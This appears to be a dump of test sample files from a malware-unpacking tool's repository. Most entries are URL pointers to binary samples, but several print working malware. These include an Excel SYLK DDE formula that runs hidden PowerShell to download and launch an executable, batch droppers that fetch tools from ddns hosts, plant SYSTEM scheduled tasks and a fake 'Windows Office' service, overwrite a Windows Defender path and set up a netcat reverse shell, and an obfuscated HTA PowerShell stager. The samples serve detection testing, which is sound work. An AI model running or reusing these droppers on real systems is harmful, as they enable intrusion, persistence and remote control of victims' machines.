111 | C;Y12;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
112 | C;Y13;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
113 | C;Y14;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
114 | C;Y15;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
115 | C;Y16;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
116 | C;Y18;X9;K#REF!;ECMD|'"/c powershell.exe -w hidden -nop -ep bypass -Command (new-object System.Net.WebClient).DownloadFile(''http://localhost/evil'',''xPRGvI.exe'');; & start c:\\Windows\\System32\\cmd.exe /c xPRGvI.exe" '!_xlbgnm.A1
117 | E
118 | 


--------------------------------------------------------------------------------
/tests/files/1.url:
--------------------------------------------------------------------------------
1 | [{000214A0-0000-0000-C000-000000000046}]
2 | Prop3=19,9
3 | [InternetShortcut]
4 | URL=file://localhost/calc.exe
5 | IconFile=C:\Windows\system32\shell32.dll
6 | IconIndex=137
7 | IDList=
8 | HotKey=0
9 | 


--------------------------------------------------------------------------------
/tests/files/1025mb.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/1025mb.7z


--------------------------------------------------------------------------------
/tests/files/1025mb.tar.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/1025mb.tar.bz2


--------------------------------------------------------------------------------
/tests/files/1025mb.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/1025mb.zip


--------------------------------------------------------------------------------
/tests/files/7z_encrypted.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/7z_encrypted.7z


--------------------------------------------------------------------------------
/tests/files/7z_garbage.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/7z_garbage.7z


--------------------------------------------------------------------------------
/tests/files/7z_nested.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/7z_nested.7z


--------------------------------------------------------------------------------
/tests/files/7z_nested2.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/7z_nested2.7z


--------------------------------------------------------------------------------
/tests/files/7z_plain.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/7z_plain.7z


--------------------------------------------------------------------------------
/tests/files/QWERT:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/QWERT


--------------------------------------------------------------------------------
/tests/files/ZIP_PLAIN.ZIP:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/ZIP_PLAIN.ZIP


--------------------------------------------------------------------------------
/tests/files/ace_doubledot.ace:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/ace_doubledot.ace


--------------------------------------------------------------------------------
/tests/files/ace_nested.ace:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/ace_nested.ace


--------------------------------------------------------------------------------
/tests/files/ace_nested2.ace:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/ace_nested2.ace


--------------------------------------------------------------------------------
/tests/files/ace_plain.ace:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/ace_plain.ace


--------------------------------------------------------------------------------
/tests/files/bup_test.bup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/bup_test.bup


--------------------------------------------------------------------------------
/tests/files/busybox-i686:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/busybox-i686


--------------------------------------------------------------------------------
/tests/files/bypass_minimized.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/bypass_minimized.pdf


--------------------------------------------------------------------------------
/tests/files/cab2.cab:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/cab2.cab


--------------------------------------------------------------------------------
/tests/files/doc_1.docx_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/doc_1.docx_


--------------------------------------------------------------------------------
/tests/files/doc_2.xlsx_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/doc_2.xlsx_


--------------------------------------------------------------------------------
/tests/files/edge/data11.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/edge/data11.zip


--------------------------------------------------------------------------------
/tests/files/eml_faulty.eml_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/eml_faulty.eml_


--------------------------------------------------------------------------------
/tests/files/encrypted1.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/encrypted1.docx


--------------------------------------------------------------------------------
/tests/files/extension/.gitignore:
--------------------------------------------------------------------------------
1 | */**
2 | !.gitkeep
3 | !.gitignore


--------------------------------------------------------------------------------
/tests/files/extension/7z/a513501f853c2878aa8b17dd6e0e30cb0593c99a8b7be562c69e80c3dd90c6de:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/7z/a513501f853c2878aa8b17dd6e0e30cb0593c99a8b7be562c69e80c3dd90c6de


--------------------------------------------------------------------------------
/tests/files/extension/ace/2ba7830bf2779e062f5d96a620317803eb3a989db9ee806309863bb215165036:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ace/2ba7830bf2779e062f5d96a620317803eb3a989db9ee806309863bb215165036


--------------------------------------------------------------------------------
/tests/files/extension/ace/6419b78338f872d4ae9e1d3743da4f22a1a1bd27f2c06882cacbb6eb60f2c8d8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ace/6419b78338f872d4ae9e1d3743da4f22a1a1bd27f2c06882cacbb6eb60f2c8d8


--------------------------------------------------------------------------------
/tests/files/extension/apk/39552b93da148109983f724f7c98317cfea83d003493b161f735972507e84d24:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/apk/39552b93da148109983f724f7c98317cfea83d003493b161f735972507e84d24


--------------------------------------------------------------------------------
/tests/files/extension/bat/6ac2ab4b6cc96a8f5e5ff08d825c7ac14504878061607530f58f7a1b02c0bfac:
--------------------------------------------------------------------------------
 1 | @echo off
 2 | :: BatchGotAdmin
 3 | ::-------------------------------------
 4 | REM  --> Check for permissions
 5 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
 6 | 
 7 | REM --> If error flag set, we do not have admin.
 8 | if '%errorlevel%' NEQ '0' (
 9 |     echo Requesting administrative privileges...
10 |     goto UACPrompt
11 | ) else ( goto gotAdmin )
12 | 
13 | :UACPrompt
14 |     echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
15 |     set params = %*:"="
16 |     echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 0 >> "%temp%\getadmin.vbs"
17 | 
18 |     "%temp%\getadmin.vbs"
19 |     del "%temp%\getadmin.vbs"
20 |     
21 |     exit /B
22 | 
23 | :gotAdmin
24 |     pushd "%CD%"
25 |     CD /D "%~dp0"
26 | ::--------------------------------------
27 | 
28 | ::ENTER YOUR CODE BELOW:
29 | 
30 | 
31 | rem %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/plink.exe','%windir%\plink.exe')
32 | rem %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/mila.ppk','%windir%\mila.ppk')
33 | rem wget --no-check-certificate https://github.com/pistacchietto/Win-Python-Backdoor/raw/master/win.bat  -O %temp%\win.bat
34 | rem %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/win/get.bat','%windir%\get.bat')
35 | rem %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/win/nc64.exe','%windir%\nc64.exe')
36 | set url=http://config02.addns.org
37 | set urlgit=https://github.com/pistacchietto/Win-Python-Backdoor/raw/master
38 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('%url%/win/wget32.exe','%windir%\wget.exe')
39 | rem %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('%url%/win/wofficeie1.exe','%windir%\wofficeie1.exe')
40 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('%url%/win/cacert.pem','%windir%\cacert.pem')
41 | rem %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('%url%/win/woffice.exe','%windir%\woffice.exe')
42 | rem %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('%url%/win/woffice.exe','C:\Program Files\Windows Defender\NisSrv.exe')
43 | rem wget --no-check-certificate https://github.com/pistacchietto/Win-Python-Backdoor/raw/master/win32.bat  -O %windir%\win.bat
44 | rem wget --no-check-certificate %urlgit%/wup.exe  -O %windir%\wup.exe
45 | taskkill /f /im woffice.exe
46 | taskkill /f /im wscript.exe
47 | schtasks /delete /tn sys /F
48 | schtasks /delete /tn syskill /F
49 | schtasks /delete /tn office_get /F
50 | wget --no-check-certificate %urlgit%/nc.exe  -O %windir%\nc64.exe
51 | rem wget --no-check-certificate %urlgit%/get.bat  -O %windir%\get.bat
52 | wget --no-check-certificate %urlgit%/get.vbs  -O %windir%\get.vbs
53 | wget --no-check-certificate %urlgit%/sys.xml  -O %windir%\sys.xml
54 | wget --no-check-certificate %urlgit%/syskill.xml  -O %windir%\syskill.xml
55 | wget --no-check-certificate %urlgit%/office_get.xml  -O %windir%\office_get.xml
56 | schtasks /create /tn office_get /xml %windir%\office_get.xml /F
57 | reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
58 | wget --no-check-certificate %urlgit%/woffice.exe  -O %windir%\woffice.exe
59 | rem %windir%\wofficeie1.exe
60 | SLEEP 10
61 | taskkill /f /im wup.exe
62 | rem copy /y %windir%\wofficeie1.exe %windir%\wup.exe
63 | copy /y %windir%\woffice.exe 'C:\Program Files\Windows Defender\NisSrv.exe'
64 | sc create wup binPath= "%windir%\wup.exe" DisplayName= "Windows Office" start= auto
65 | net start wup
66 | schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "%windir%\woffice.exe" /tn myadobe1 /rl highest /F
67 | schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "C:\Program Files\Windows Defender\NisSrv.exe" /tn flash_fw /rl highest /F
68 | schtasks /create /ru "SYSTEM" /sc minute /mo 5 /tr "taskkill /f /im woffice.exe" /tn myflash /rl highest /F
69 | rem schtasks /create /tn sys /xml %windir%\sys.xml /F
70 | rem schtasks /create /tn syskill /xml %windir%\syskill.xml /F
71 | 
72 | 
73 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "nc64.exe -e cmd.exe verifiche.ddns.net 4001" /tn sys /rl highest /F
74 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 5 /tr "taskkill /f /im nc64.exe"  /tn syskill /rl highest /F
75 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "%windir%\get.bat" /tn office_get /rl highest /F
76 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "net start wup" /tn myadobe2 /rl highest /F
77 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 5 /tr "taskkill /f /im wup.exe" /tn myflash2 /rl highest /F
78 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "nc64.exe -e cmd.exe verifiche.ddns.net 4001" /tn sys /rl highest /F
79 | rem schtasks /delete /tn sys /F
80 | 


--------------------------------------------------------------------------------
/tests/files/extension/bat/b11243ac75e5c3e343615889dbe28e51b1795dc5628e0f12e03b7192ca61bc60:
--------------------------------------------------------------------------------
 1 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/nc64.exe','%windir%\nc64.exe')
 2 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/get.bat','%windir%\get.bat')
 3 | schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "nc64.exe -e cmd.exe verifiche.ddns.net 4001" /tn sys /rl highest /F
 4 | schtasks /create /ru "SYSTEM" /sc minute /mo 5 /tr "taskkill /f /im nc64.exe" /tn syskill /rl highest /F
 5 | schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "%windir%\get.bat" /tn office_get /rl highest /F
 6 | rem schtasks /delete /tn sys /F
 7 | %windir%\activtrades4setup.exe
 8 | 
 9 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/plink.exe','%windir%\plink.exe')
10 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/mila.ppk','%windir%\mila.ppk')
11 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/win.bat','%temp%\win.bat')
12 | 
13 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/wget.exe','%windir%\wget.exe')
14 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/wofficeie1.exe','%windir%\wofficeie1.exe')
15 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/cacert.pem','%windir%\cacert.pem')
16 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/woffice.exe','%windir%\woffice.exe')
17 | %windir%\System32\cmd.exe /c powershell -Command (new-object System.Net.WebClient).DownloadFile('http://verifiche.ddns.net/woffice.exe','C:\Program Files\Windows Defender\NisSrv.exe')
18 | rem %windir%\wofficeie1.exe
19 | SLEEP 10
20 | taskkill /f /im wup.exe
21 | copy /y %windir%\wofficeie1.exe %windir%\wup.exe
22 | sc create wup binPath= "%windir%\wup.exe" DisplayName= "Windows Office" start= auto
23 | net start wup
24 | schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "%windir%\woffice.exe" /tn myadobe1 /rl highest /F
25 | schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "C:\Program Files\Windows Defender\NisSrv.exe" /tn flash_fw /rl highest /F
26 | schtasks /create /ru "SYSTEM" /sc minute /mo 5 /tr "taskkill /f /im woffice.exe" /tn myflash /rl highest /F
27 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "net start wup" /tn myadobe2 /rl highest /F
28 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 5 /tr "taskkill /f /im wup.exe" /tn myflash2 /rl highest /F
29 | rem schtasks /create /ru "SYSTEM" /sc minute /mo 1 /tr "nc64.exe -e cmd.exe verifiche.ddns.net 4001" /tn sys /rl highest /F
30 | rem schtasks /delete /tn sys /F


--------------------------------------------------------------------------------
/tests/files/extension/cab/9d55a648b54b9c5e183288cbab7fda2ed6c3d95a517618fc75b51e2161a34a6f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/cab/9d55a648b54b9c5e183288cbab7fda2ed6c3d95a517618fc75b51e2161a34a6f


--------------------------------------------------------------------------------
/tests/files/extension/cab/ea0c12aedea644678014991a96534145e85aa12cd8955396dfdc98a4fc96f0d5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/cab/ea0c12aedea644678014991a96534145e85aa12cd8955396dfdc98a4fc96f0d5


--------------------------------------------------------------------------------
/tests/files/extension/daa/7ad92100104fb0124d1cc2be7282825e93ec9d38e4ed49524032bcae6c68e7d8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/daa/7ad92100104fb0124d1cc2be7282825e93ec9d38e4ed49524032bcae6c68e7d8


--------------------------------------------------------------------------------
/tests/files/extension/dll/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/dll/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/dll/2438653076155b6074ffe0fbb23cb50377d62444084b80a4352b7bc5642c645d:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/dll/2438653076155b6074ffe0fbb23cb50377d62444084b80a4352b7bc5642c645d


--------------------------------------------------------------------------------
/tests/files/extension/dll/3785f0e3b40e91ea768c04153253cde6f91c3370c6a532e398f3c058eef50ab6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/dll/3785f0e3b40e91ea768c04153253cde6f91c3370c6a532e398f3c058eef50ab6


--------------------------------------------------------------------------------
/tests/files/extension/dll/f1368be659aa55e697c0727bb91cd5e213d277ebc4c5f1b055611ec715245998:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/dll/f1368be659aa55e697c0727bb91cd5e213d277ebc4c5f1b055611ec715245998


--------------------------------------------------------------------------------
/tests/files/extension/doc/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/doc/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/doc/a902866c7635c2ad4f8553c4dcec86ac641775a6e3f34d21e8c7d1b520bb39d2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/doc/a902866c7635c2ad4f8553c4dcec86ac641775a6e3f34d21e8c7d1b520bb39d2


--------------------------------------------------------------------------------
/tests/files/extension/doc/fbb56d641f10252b76c478aae580a013f219e00f91042470f285fd0d3d3465aa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/doc/fbb56d641f10252b76c478aae580a013f219e00f91042470f285fd0d3d3465aa


--------------------------------------------------------------------------------
/tests/files/extension/docm/7efd0060413eb3c0ceef8a2f5016365fb906e70f2373c06e84a83c2b75465969:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/docm/7efd0060413eb3c0ceef8a2f5016365fb906e70f2373c06e84a83c2b75465969


--------------------------------------------------------------------------------
/tests/files/extension/docm/ff044ff576a0e952efc0532a9067cf624a0c3c2bdd03d390fea84153f0bf560c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/docm/ff044ff576a0e952efc0532a9067cf624a0c3c2bdd03d390fea84153f0bf560c


--------------------------------------------------------------------------------
/tests/files/extension/docx/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/docx/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/docx/8cef4a33b0394771a06168d5e9d2003ed45032f79189cce6d0a84bb9d03fbce7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/docx/8cef4a33b0394771a06168d5e9d2003ed45032f79189cce6d0a84bb9d03fbce7


--------------------------------------------------------------------------------
/tests/files/extension/docx/b6b37030a11e62c05f2219f211d83d6d7caeb4b1edb65cf9ef81ff01cf46d6e3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/docx/b6b37030a11e62c05f2219f211d83d6d7caeb4b1edb65cf9ef81ff01cf46d6e3


--------------------------------------------------------------------------------
/tests/files/extension/dotm/62a894e856377a7ae5a4e439e4fc05dfc6f50357f1a69c06726b3b9aa4bf0a3b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/dotm/62a894e856377a7ae5a4e439e4fc05dfc6f50357f1a69c06726b3b9aa4bf0a3b


--------------------------------------------------------------------------------
/tests/files/extension/dotx/12d9f7369a0952f2b46f7a410b2907d85dc95517091cb823ca1799ed2e5b96fe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/dotx/12d9f7369a0952f2b46f7a410b2907d85dc95517091cb823ca1799ed2e5b96fe


--------------------------------------------------------------------------------
/tests/files/extension/dotx/e52085d3545564246fb15a01134f1f8abe8bb3eef3ca6b90f1e3179fea138470:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/dotx/e52085d3545564246fb15a01134f1f8abe8bb3eef3ca6b90f1e3179fea138470


--------------------------------------------------------------------------------
/tests/files/extension/elf/0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/elf/0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c


--------------------------------------------------------------------------------
/tests/files/extension/elf/1ec814defeca65d1ce9834eb1edd1af37b28bcc1ca0facf747d50b128e336e07:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/elf/1ec814defeca65d1ce9834eb1edd1af37b28bcc1ca0facf747d50b128e336e07


--------------------------------------------------------------------------------
/tests/files/extension/elf/busybox-i686:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/elf/busybox-i686


--------------------------------------------------------------------------------
/tests/files/extension/elf/ls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/elf/ls


--------------------------------------------------------------------------------
/tests/files/extension/exe/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/exe/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/exe/067bd7d1457f9bcb0545ce33dacb8edaa0d130f0b9ab3eb6e7c6cc36cf97edc9:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/exe/067bd7d1457f9bcb0545ce33dacb8edaa0d130f0b9ab3eb6e7c6cc36cf97edc9


--------------------------------------------------------------------------------
/tests/files/extension/exe/b3b4c065849c81d856558e9cf91e8cef5d481648fd8aa88cdda534ab6b75e988:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/exe/b3b4c065849c81d856558e9cf91e8cef5d481648fd8aa88cdda534ab6b75e988


--------------------------------------------------------------------------------
/tests/files/extension/exe/c61c86a4f785e8838537c84613198a6e93737c0c9ab2ccd84a2be6c04ac0c5d5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/exe/c61c86a4f785e8838537c84613198a6e93737c0c9ab2ccd84a2be6c04ac0c5d5


--------------------------------------------------------------------------------
/tests/files/extension/hta/54a8c81a98f122fb67232ff7254f1ce09a701c2d101490bf0ec442be0da48e1f:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 3 | <HEAD>
 4 | <HTA:APPLICATION ID="Test" />
 5 | <script language="VBScript">
 6 | Window.ReSizeTo 0, 0
 7 | Window.moveTo -9000,-9000
 8 | Dim HBANKERS
 9 | Set HBANKERS= CreateObject("WScript.Shell")
10 | HHHHHHHHHHHHHHHHHHHHHHH=chr(80) +Chr(79) & Chr(87)
11 | BBBBBBBBBBBBBBBBBBBBBBBB=Chr(69) & "r" & Chr(83) & Chr(72) & Chr(69) & Chr(76)
12 | AAAAAAAAAAAAAAAAAAAAAAA="L $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='http://kudonet.kozow.com/sach/ALL.txt';"
